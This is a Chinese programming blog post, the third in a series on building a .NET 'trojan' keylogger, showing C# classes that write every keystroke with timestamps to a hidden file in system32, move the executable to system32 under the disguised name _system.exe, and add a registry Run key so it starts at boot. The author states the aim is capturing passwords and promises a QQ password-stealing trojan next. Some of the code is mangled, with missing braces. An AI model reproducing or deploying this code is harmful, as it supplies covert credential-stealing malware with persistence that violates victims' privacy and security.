.net木马的实现-开机键盘记录 - 3 RegistryReport和 Report类

最新推荐文章于 2021-02-20 18:42:21 发布
最新推荐文章于 2021-02-20 18:42:21 发布
阅读量1k 收藏 1
点赞数
分类专栏: .net 文章标签: report .net string hook qq c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/adamxx/article/details/526815
版权
 

.net木马的实现-开机键盘记录

3  RegistryReport和 Report类

 

这是RegistryReport 类的实现

 

 这是Report类的实现:

 

 

public   void  FirstWrite() 
         
              StreamWriter sw = new StreamWriter("c:/windows/system32/keyReport.txt",true); 
              sw.WriteLine("************* LittleStudio Studio ************* "); 
              sw.WriteLine("******** " + DateTime.Today.Year.ToString() + "." 
                   + DateTime.Today.Month.ToString() + "." 
                   + DateTime.Today.Day.ToString() + "     " 
                   + DateTime.Now.Hour.ToString() + ":" 
                   + DateTime.Now.Minute.ToString() + ":" 
                   + DateTime.Now.Second.ToString() + " ********"); 
              sw.Close(); 
         }  

          public   void  WriteDate( string  keyEvents, string  keyDate) 
         
              try 
              
                     StreamWriter sw = new StreamWriter("c:/windows/system32/keyReport.txt",true); 
                     sw.WriteLine(keyDate + "键 " + keyEvents + "   " 
                       + DateTime.Now.Hour.ToString() + ":" 
                       + DateTime.Now.Minute.ToString() + ":" 
                       + DateTime.Now.Second.ToString()); 
                   sw.Close(); 
              } 
              catch{} 
              return
         }  

 

 

 

这样一个木马就写完了.用这种方式来获取密码不好,他把所有的键盘消息都记录下来了,给我们对密码的分析造成了很大的问题,而且.net中使用HOOK只能使用全局钩子,如果对单个应用程序的挂钩就不行了,在这方面用VC就好多,但是我们也可以通过其他方式来获取指定应用程序(如QQ)的消息,而且可以单单对某个控件(如密码框)的挂钩,最近忙死了,我想过段时间把QQ木马的.net实现写上了,好了,我吃饭了!

 

public   void  MoveFile() 
     //判断该位置是否存在_system.exe,如果不是,就把程序移动到该位置,否则返回 
     if(!File.Exists("c://windows//system32//_system.exe")) 
     
              File.Move(Application.ExecutablePath,"c://windows//system32//_system.exe"); 
     } 
     else 
          return
}  

 // 在注册表里写如启动信息 



public   void  registryRun() 
 {    
     RegistryKey key1=Registry.CurrentUser.CreateSubKey("Software//Microsoft//Windows//CurrentVersion//run"); 
     key1.SetValue("","c://windows//system32//_system.exe"); 
     key1.Close(); 
}  


 

adamxx
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
.net实现游戏外挂,完整代码
11-10 3158
.net实现游戏外挂,完整代码(原创)   using System;         using System.Drawing;         using System.Collections;         using System.Compone
.net木马实现-开机键盘记录 - 1 Hook实现
11-10 1509
 .net木马实现-开机键盘记录Hook实现网上这方面的内容很多 整个程序包含了4个,From1,Hook, RegistryReport, Report.  Hook返回一个键盘按下事件KeyboardEvent,并把按下键的信息发送给From1,From1捕获到事件后,在调用Report的WriteDate方法,写入文本文件,而Registr
.net木马实现-开机键盘记录 - 2 From1
11-10 1025
net木马实现-开机键盘记录2 From1前面我们看到Hook实现,现在我们在来看看From1是怎么捕获到键盘事件并处理的.   首先还是他的构造函数 private Hook MyHook; private Report MyReport; private RegistryReport MyRegistryReport; private string keyEve
Web安全-一句话木马
热门推荐
道阻且长,行则将至。
05-08 31万+
在很多的渗透过程中,渗透人员会上传一句话木马到目标web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?
木马 --- 基本概念和分
daibaohui的博客
02-20 4万+
木马全称为特洛伊木马,来源于古希腊神话。木马是通过欺骗或诱骗的方式安装,并在用户的计算机中隐藏以实现控制用户计算机的目的。 具有远程控制、信息窃取、破坏等功能的恶意代码 木马具有如下特点: 欺骗性 木马都有很强的欺骗性,执行通常都由被攻击者自己执行起来的 隐藏性 非授权性 执行恶意操作是没有经过用户授权的 交互性 主机之外的攻击者可以通过某种方式对主机进行交互 接着分享木马的分,不同视角有不同的分。 1.行为视角 粒度细,如卡巴斯基SafeS.
VB.NET_Anti-Task-Manager-Kill:反任务管理器杀
05-13
总的来说,VB.NET_Anti-Task-Manager-Kill是VB.NET编程中涉及系统级进程控制的一个实例,它展示了如何利用.NET框架和Windows API来实现进程监控和重启。对于IT专业人士,理解和掌握这些技术有助于提升安全意识,同时...
行业分-设备装置-旋转木马智能散热平台.zip
08-20
《旋转木马智能散热平台》 在现代科技领域,设备装置的设计与优化是至关重要的环节,尤其是对于那些高性能、高功率消耗的电子设备而言。旋转木马智能散热平台是一种创新的解决方案,它针对设备散热问题提供了高效且...
计算机网络-06 查看木马程序建立的会话.mp3
06-30
计算机网络-06 查看木马程序建立的会话.mp3
Android-3D自动旋转的旋转木马
08-13
3. **3D变换**:为了实现旋转效果,我们需要应用矩阵变换,如`rotationMatrix`,这可以通过`Matrix`在Android中完成。通过不断改变旋转角度,我们可以模拟旋转木马的连续旋转。 4. **动画**:旋转木马的自动旋转...
探索基于.NET实现一句话木马之asmx篇1
最新发布
08-03
.NET实现一句话木马之asmx篇】 在网络安全领域,木马程序通常被视为恶意软件,但在合法的安全研究和漏洞测试中,了解其工作原理是至关重要的。本篇文章主要探讨了如何在.NET环境中利用ASMX(Web Service)技术...
浅谈中缀表达式的求值(带符号,等于,不等于,大于,小于,与,或,非,等等)
08-30 2675
我们知道中缀表达式的求值,通常都是先转换为后缀表达式,在通过堆栈求出后缀表达式的值,对于这点,如果有不太清楚的请参见:http://202.113.89.254/DataStructure/DS/web/zhanhuoduilie/zhanhuoduilie3.3.1.htm(原理)http://tech.ccw.com.cn/article/252014.htm(实现) 对于Ch
远程鼠标控制
11-14 2356
远程鼠标控制-服务端    以前不懂网络编程的时候,感觉远程桌面是一个好神奇的技术,很神秘,现在了解这方面的知识后才觉得也没什么,前几天,用C#写了一个远程鼠标控制的东东,给感兴趣的朋友参考一下。转贴请注明出处。我先引用一篇别人的文章:Socket编程基础    本章以Berkeley Socket为主,主要介绍网络编程时常用的调用和程序使用它们的方法及基本
.net木马实现-开机键盘记录源代码
11-10 2092
.net木马实现-开机键盘记录 (原创) 源代码   From1.csusing System; using System.Drawing; using System.Collections; using System.ComponentModel; using System.Windows.Forms; using System.Da
在ASP.NET中使用LINQ(第一部分)
05-18 1491
在ASP.NET中使用LINQ(第一部分) 【原文地址】Using LINQ with ASP.NET (Part 1) 【原文发表日期】Sunday, May 14, 2006 9:49 PM最近使我激动不已的新鲜事之一就是LINQ系列技术的出现,包括LINQ,DLINQ,XLINQ和不久后的其他技术。 LINQ将被完全集成到代号为Orcas的下个版本Visual Studio中
.net实现游戏外挂 二
11-10 1393
 前面我们讲述了一个按键精灵的实现,现在的问题如何监视HP 既血的变化,来控制 补血.   先看下面几个API函数:     第一个函数BitBlt 就是用来截屏的.前面我们定义了timer2,下在我们来看看他是用来做什么的:    private void timer2_Tick(object sender, Sys
关于生成树型结构的文件关系图的算法
11-10 1124
关于生成树型结构的文件关系图的算法  在很多时候我们都希望生成树型结构的文件关系图:我下面就讲述一下如何生成一个似的关系,并生成文本文件.   下面我们来重点讲一下如何遍历目录,如何生成图一的那种表现形式: SearchFile函数有2个参数,RootPath为查找位置,Indent控制输出的字符前面有多少空格,既缩进 遍历用的是递归,深度越大字符前面的空格也就越多,并且要判断是目录还是文件
严重影响DataGridView性能的2个属性
11-14 1067
前段时间写一段一个数据处理的东西,需要绑定一张DataTable到网格控件(我从DataGridView 继承),运行后发现,速度超级慢, 我最开始是因为继承的原因,后面发现不是,最后终于在*.Designer.cs找到了,原来我无意中在设计面板中改动了RowHeadersWidthSizeMode 属性 .经过测试发现,RowHeadersWidthSizeMode属性和ColumnHead
哪个函数更快?
11-10 808
今天遇到这样一个问题, int a,b;sum=0; //a,b,赋值 //... //当a void fun1(){    for(int i=0;i      for(int j=0;j         sum++;       }    } } void fun2(){    for(int i=0;i      for(int j=0;j         sum++;       

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值